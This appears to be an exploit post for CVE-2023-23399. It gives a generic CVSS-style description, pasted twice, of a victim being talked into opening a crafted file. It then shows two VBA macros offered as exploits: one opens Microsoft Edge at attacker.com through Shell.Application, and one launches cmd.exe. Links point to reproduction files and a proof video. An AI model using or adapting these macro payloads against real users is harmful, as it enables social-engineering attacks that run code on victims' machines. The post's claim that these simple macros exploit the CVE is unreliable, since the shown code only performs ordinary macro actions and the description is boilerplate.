## Date: 03.16.2023
## CVE ID: CVE-2023-23399
## Description:
The malicious user can exploit the victim's PC remotely.
For example, when the score indicates that the Attack Vector is Local
and User Interaction is Required, this could describe an exploit in
which an attacker, through social engineering, convinces a victim to
download and open a specially crafted file from a website which leads
to a local attack on their computer.
Enjoy!
## CVE ID: CVE-2023-23399
## Description:
The malicious user can exploit the victim's PC remotely.
For example, when the score indicates that the Attack Vector is Local
and User Interaction is Required, this could describe an exploit in
which an attacker, through social engineering, convinces a victim to
download and open a specially crafted file from a website which leads
to a local attack on their computer.
Код:
[+]Exploit0:
```
Sub Check_your_salaries()
CreateObject("Shell.Application").ShellExecute
"microsoft-edge:https://attacker.com"
End Sub
```
[+]Exploit1:
```
Sub cmd()
Dim Program As String
Dim TaskID As Double
On Error Resume Next
Program = "cmd.exe"
TaskID = Shell(Program, 1)
If Err <> 0 Then
MsgBox "Can't start " & Program
End If
End Sub
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-23399)
## Proof and Exploit:
[href](https://streamable.com/dnyfx0)
## Time spend:
03:00:00Enjoy!